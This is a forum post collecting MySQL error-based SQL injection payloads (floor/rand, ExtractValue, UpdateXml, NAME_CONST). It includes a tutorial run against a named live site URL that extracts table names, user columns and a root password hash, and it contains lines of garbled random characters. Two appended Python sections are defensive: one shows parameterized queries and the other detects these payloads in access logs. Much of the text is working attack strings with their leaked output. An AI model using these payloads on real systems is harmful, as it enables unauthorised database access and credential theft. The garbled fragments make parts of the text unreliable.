Views: 3661 | Replies: 0
MySQL: exploiting the floor, ExtractValue and UpdateXml error-based injection modes

Posted by the original poster on 2015-11-11 19:03:37

1. Triggering the error with floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

An example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The error successfully leaks the MySQL version. To retrieve other data, replace version() with the desired subquery.
For example, to retrieve the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

The test statement is as follows:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
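All three techniques above depend on the same two application defects: the id parameter is concatenated into `select * from article where id = ...`, and the resulting database error is shown to the client. The following is an added example (not code from the original post) that puts the injectable query beside its parameterized form; SQLite stands in for MySQL, so the MySQL-specific functions do not exist here, but the structural difference is the same.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the post's "article" table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, content TEXT)")
    con.execute("INSERT INTO article VALUES (1, 'test', 'do it')")
    return con

def lookup_unsafe(con, raw_id):
    """Injectable form: the parameter is pasted into the SQL text, so anything
    after the number is parsed as part of the statement."""
    sql = "SELECT * FROM article WHERE id = " + raw_id
    return con.execute(sql).fetchall()

def lookup_safe(con, raw_id):
    """Parameterized form: the value travels separately from the statement,
    so it is compared as data and never parsed as SQL."""
    return con.execute("SELECT * FROM article WHERE id = ?", (raw_id,)).fetchall()

def classify(con, raw_id):
    """Run both forms on the same input. Returns (unsafe_outcome, safe_rows):
    unsafe_outcome is "rows" or the database error text, which is exactly the
    channel the post's error-based techniques read data from."""
    try:
        lookup_unsafe(con, raw_id)
        unsafe = "rows"
    except sqlite3.Error as exc:
        unsafe = "error: " + str(exc)
    return unsafe, lookup_safe(con, raw_id)

if __name__ == "__main__":
    db = make_db()
    # One of the post's payloads (the UpdateXml form) appended to a valid id.
    payload = "1 and 1=(updatexml(1,concat(0x3a,(select user())),1))"
    print(classify(db, "1"))       # ('rows', [(1, 'test', 'do it')])
    print(classify(db, payload))   # ('error: no such function: ...', [])
```

The parameterized lookup returns no rows for the payload because the whole string is compared against the integer column as a value; the unsafe lookup instead hands the attacker the database's error text, and that error text, not the query result, is what the post's three methods read data from.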


Additional collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection tricks for newer MySQL versions: injecting with NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)
+------+
| TEST |
+------+
|    1 |
+------+
http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.
Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables
Let's try it out on my site..
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

1 K, j( _, v& }% }) d+ D% D) G, }. m5 }* U3 g, D

! P* `) J4 c" O

5 D4 j6 B' }, F. J: h( @* N2 D! S
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
We should get a duplicate column 1 error...
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
Error: Duplicate column name '1'

+ e7 ]' w0 }+ [" A. g# V7 k7 k6 l
& a* g! c7 K3 Y; N) z: J( y! k, O0 F% C7 _2 f. j
7 p0 ?8 J7 v4 ^- z0 {, u9 Y

6 Q8 n- Z! g3 y- t2 c+ T
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Let's see if it works here, if it does, we can go on and finish the job.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

8 f3 _; [8 J; A! w4 Y, `9 A- n  r; b- @: j3 R: b4 _
Erroruplicate column name 'com_admanage4 k7 _& s, h3 s! }: {" u# Y
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

% k1 e6 d3 c6 ~7 [! d, L8 x2 D0 |
- v, ^( ^: ?' \9 d- G* [So mine looks like this...
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

" |" [' @% r( G, n" b9 G0 SErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
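All four techniques collected on this page (floor, ExtractValue, UpdateXml and NAME_CONST) leave two recognisable traces: the function call in the request and the MySQL error text in the response. The detector below is an added example, not part of the original post; the access-log lines it scans are constructed from the post's own payloads, and the regular expressions are assumptions about how those payloads appear on the wire.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the four techniques in the post, matched against the
# URL-decoded, lower-cased query string (so "+" and %xx encoding are handled first).
REQUEST_SIGNATURES = {
    # floor(rand(0)*2) only errors together with GROUP BY, so require both
    "floor": re.compile(r"(?=.*floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\))(?=.*group\s+by)", re.S),
    "extractvalue": re.compile(r"extractvalue\s*\("),
    "updatexml": re.compile(r"updatexml\s*\("),
    # two NAME_CONST calls in one derived table is what yields "Duplicate column name"
    "name_const": re.compile(r"name_const\s*\(.*name_const\s*\(", re.S),
}

# Response-side signatures: the MySQL error texts shown in the post. A response
# containing one of these is leaking database errors, and with them the data.
RESPONSE_SIGNATURES = {
    "floor": re.compile(r"Duplicate entry '[^']*' for key 'group_key'"),
    "xpath": re.compile(r"XPATH syntax error: '"),
    "name_const": re.compile(r"Duplicate column name '"),
}

def classify_request(query_string):
    """Names of the techniques whose request signature matches the query."""
    decoded = unquote_plus(query_string).lower()
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(decoded)]

def classify_response(body):
    """Names of the error texts found in a response body."""
    return [name for name, rx in RESPONSE_SIGNATURES.items() if rx.search(body)]

def scan_access_log(lines):
    """Return (line_number, techniques) for every request line that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        path = line.split(" ")[1] if " " in line else line   # "GET <path> HTTP/1.1"
        found = classify_request(path.partition("?")[2])
        if found:
            hits.append((n, found))
    return hits

# Constructed sample log lines modelled on the payloads in the post (assumption).
SAMPLE_LOG = [
    "GET /detail.php?id=330&sid=19&cid=261 HTTP/1.1",
    "GET /detail.php?id=1+and+extractvalue(1,concat(0x5c,(select+pass+from+admin+limit+1)))-- HTTP/1.1",
    "GET /detail.php?id=1+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1",
    "GET /detail.php?id=1+and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+by+concat(version(),floor(rand(0)*2)))-- HTTP/1.1",
]

if __name__ == "__main__":
    for n, found in scan_access_log(SAMPLE_LOG):
        print(n, found)   # 2 ['extractvalue'], 3 ['name_const'], 4 ['floor']
```

The response-side check is the more durable of the two: request signatures can be evaded with comments and alternative encodings, whereas an application that never returns raw database error text to the client removes the channel all four techniques rely on.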
